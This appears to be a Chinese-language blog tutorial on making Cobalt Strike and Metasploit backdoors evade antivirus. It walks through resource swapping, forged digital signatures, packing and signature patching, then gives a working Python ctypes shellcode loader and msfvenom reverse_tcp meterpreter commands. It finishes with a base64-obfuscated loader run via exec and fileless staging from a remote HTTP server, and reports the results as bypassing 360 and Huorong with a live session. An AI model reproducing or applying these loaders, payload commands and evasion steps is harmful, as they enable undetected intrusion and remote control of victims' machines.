Python shellcode免殺
一．前言
在安全廠商日趨成熟的背景下，撰寫免殺馬的難度和成本日益增長，好用新興的開源專案在短時間內就被分析并加入特征庫，目前的免殺專案發布不久就會無法免殺，但也有兩種可以發展的方向，一個是學習其思想，自己實作并去特征免殺；二是改造原有專案，自己查特征、去特征，經過測驗也能達到免殺，
二．殺軟檢測方法
1.特征碼檢測
2.關聯內容檢測(比如在使用加載器加載shellcode時，需要開辟記憶體，將shellcode加載進記憶體，最后執行記憶體區域shellcode，這些步驟就被反病毒人員提取出來作為特征，在呼叫了一組開辟記憶體的函式比如virtualAlloc之后對該記憶體使用virtualProtect來更改標示位為可執行并且對該記憶體進行呼叫就會觸發報毒)
3.動態行為檢測（一般就是呼叫系統底層api，敏感函式會被殺軟標識）
三．常用免殺技術
?特征碼修改
?花指令免殺
?加殼免殺
?記憶體免殺
?二次編譯
?分離免殺
?資源修改
?白名單免殺
由于本文篇幅有限所以就只涉及其中部分的幾個技術點，首先我們先了解特征碼的概念我本人的理解就是特征碼是經過特定方法掃描病毒源代碼后所得到的對于特定病毒的唯一標識，目前主流的APT工具 cobaltstrike 和msf 都已經被各大殺毒軟體廠商盯上所以對于兩款軟體生成出來的后門毫無疑問肯定是秒被殺的，那么對于如何消去特征碼呢？我認為主要分三個方面（1.針對exe外部修改，包括修改資源檔案，加殼，修改數字簽名2.用特征碼定位工具myccl定位特征碼區段修改其匯編指令3.自寫shellcode loader對敏感函式進行加解密混淆，無檔案落地，分離免殺等操作）
首先介紹我的第一種思路
這里我給大家用cobaltstrike演示 首先選擇監聽器生成木馬

特征碼很明顯一生成就被火絨標識洗掉，那么我們可以對生成的后門木馬進行資源替換，添加數字簽名，加殼的方法打亂其原本的特征碼使殺毒軟體無法正常識別原有特征碼實作免殺
首先打開工具Restorator資源修改工具，我們打算將后門檔案的資源檔案更換成我們常用的steam軟體的資源檔案

將后門exe拖入 和steam.exe拖入工具

我們進行替換操作將steam游戲的資源復制到后門程式上替換完成如圖
保存退出發現我們后門程式的圖示和資訊已經改變

接下來我們利用k8工具修改數字簽名360的簽名

添加以后我們來到了最關鍵的一步就是進行加殼，在這里殼的選擇也很有講究，市面上有很多加殼產品有加密殼，壓縮殼…等 所以我們在選擇時候要根據自己后門不同的情況而選擇，要注意加殼可能會影響原有程式的功能所以要逐一去嘗試 不同的殼對于和殺毒軟體對抗有不同的效果 免殺比較流行的壓縮殼upx目前也已經被各大殺毒廠商盯上所以免殺效果不如人意在這里我給大家用Shielden這款優秀的加殼工具進行實驗，打開軟體載入我們的后門程式

在這里我們可以針對性的選擇加殼選項，開發能力比較弱的師傅可以直接默認加殼
加殼完成我們進行查看

可以發現成功過了目前主流的殺毒軟體360和火絨，并且上線正常

在這里介紹我的第二種思路
定位并且修改后門程式的特征碼首先設定監聽器生成后門beacon2.exe

很顯然再一次被查殺，我們的思路就是用特征碼定位工具進行定位特征碼區段，打開myccl載入我們的后門程式，定位特征碼的原理我個人理解就是將一整個程式段細分成好多小的程式段如何匯出來用殺軟進行查殺，被查殺的那個就是特征碼所在的區段，然后再對剛剛被查殺的那個代碼區段再進行細分，再匯出來讓殺軟去查殺直到殺軟不報毒說明已經定位到了特征碼的區段，然后對特征碼修改，這樣的方法是最高效的但同時也是最雞肋的有時候的特征碼修改會導致程式無法正常運行，而且修改特征碼需要有很強的匯編知識和逆向功底
定位特征碼經典的有myccl工具，但這里為了節約時間我用virtest工具進行自動化定位特征碼首先打開工具將后門檔案載入制作成待測樣本

然后載入待測樣本下一步開始檢測定位特征碼

在這里我選擇了自動確定選項程式會幫我們自動找出特征碼區間

用c32asm打開我們的特征碼區間00044E38和00045EB1
我們可以在他的接下來資料段加花指令和填充資料干擾其原有程式便移量比如

push ebp

push esp

pop ebp

add esp,-0C

add esp,0C

push eax

jmp入口

在這里我只能選擇加花和填充垃圾資料繞過殺軟但是很遺憾全部失敗，那么為什么不選擇修改匯編指令呢因為，在這里的匯編指令沒有可以替換的陳述句，殺軟對于這種cs或者msf生成出來的后門特征碼標識的十分精細，很難通過修改apt工具的特征碼繞過檢測，特征碼如圖但是我們可以借用修改特征碼這個思路去修改我們自寫的后門病毒特征碼，這樣是很容易實作的，修改特征碼應該是我們的一個思路，

分享我的第三個思路自寫shellcoe 加載器
提到python免殺就必須知ctypes ctypes是 Python的外部函式庫，它提供了與 C 兼容的資料型別，并允許呼叫 DLL 或共享庫中的函式，具體可參考文末的官方檔案，簡單的來說就是參考了ctypes庫就能在python中執行c的代碼
廢話不多說上代碼：

-- coding: utf-8 --

import ctypes

Buf = # CS或者msf生成的ShellCode
shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ctypes.c_int(0)
ctypes.c_int(len(shellcode))
ctypes.c_int(0x3000)
ctypes.c_int(0x40)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
lpThreadAttributes
dwStackSize
lpStartAddress
lpParameter
dwCreationFlags
lpThreadId
“”"
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
這個loader就是在記憶體中開辟一段記憶體空間然后將我們的生成出來的shellcode放入創建執行緒執行，用到了.VirtualAlloc函式去申請記憶體，這個函式還是比較敏感的，殺軟對函式的查殺說白了還是對黑名單的限制這樣總會有漏網之魚，在github上有大佬寫了很多c的利用不同函式的loader呼叫代碼 所以我們理所當然需要對其進行代碼混淆 有的方法并沒有被殺毒軟體標識，但是在這里我們以這個loader為例我們既然不需要這個特征碼我們就需要對他進行代碼混淆

我們首先在msf上生成payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=8000 -f py

然后放到loader中測驗運行

成功上線 利用pyinstall 打包器打包exe生成出來被殺

我們進行代碼混淆首先引入base64庫 然后用msf對shellcode進行base64編碼
msfvenom -p windows/x64/meterpreter/reverse_tcp --encrypt base64 lhost= ip lport=8000 -f py

增加代碼

對base64先進行解碼再傳參代入并且將原本的shellcode loader
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
改寫成一句話并且進行base64加密為
Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NDtwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSksIGN0eXBlcy5jX2ludCgweDMwMDApLGN0eXBlcy5jX2ludCgweDQwKSk7YnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oc2hlbGxjb2RlKSkuZnJvbV9idWZmZXIoc2hlbGxjb2RlKTtjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoY3R5cGVzLmNfdWludDY0KHB0ciksIGJ1ZiwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSk7aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLCBjdHlwZXMuY19pbnQoLTEpKQ==
然后通過exec（執行base64編碼后的值）如圖成功上線，這樣我們對代碼進行了混淆即shellcode混淆和shellcode loader混淆

生成出來的2.exe成功過掉360和火絨
繼續進行優化那么如果我對shellcode和 shellcode loader分開呢？那就做到了分離免殺，那如果我把他們不放在本地資源而放到網路資源中呢那就做到了無檔案落地，我通過http請求去從我的遠程服務器上下載加密過后的shellcode和加密過后的shellcode loader那么就更加沒有特征碼再代碼中只有請求遠程資源的指令，
在我的遠程服務器開啟http服務并且創建1.txt放入base64加密過后的shellcode 2.txt放入加密過后的shellcode loader

注意踩坑（放入base64 的shellcode不要放入byte流的格式要放入字串形式的shellcode可以自寫腳本轉換一下）
1.txt內容

2.txt內容

核心代碼段成功收到會話

只有一件殺毒引擎報毒，殺毒效果十分理想
注（免殺效果 針對不同的語言的shellcode 和loader有不一樣的效果，在這里只是演示了python 其他語言也可以做免殺 越小眾語言效果越好，不同的exe打包器有不同效果這里實驗用的是pyinstall 實際中還可以用py2exe打包，而且很有很有趣的一點代碼中盡量避免出現敏感詞匯這樣也會降低查殺率，不同的殼也有不同的效果）

總結：免殺最主要的是思路，要打組合拳才能夠免殺效果更好，比如最后的實驗我還可以繼續加殼，修改資源檔案，數字簽名等等，而且在代碼混淆力度上還可以進行復雜高強度加密演算法比如aes加解密 把base64加密再加一次密，這樣對于殺毒引擎來說更加難進行還原源代碼，總之就是盡可能的去消除特征碼，而且還可以利用我們前面介紹的修改特征這是最直接的方法去繞過殺軟，當然免殺還有其他技術比如白名單技術，二次編譯等，這里篇幅有限沒有辦法繼續深入講下去，免殺是一個經久不衰的技術需要我們擴散思維 經常學習，免殺技術就是網路中的攻與防的實力較量，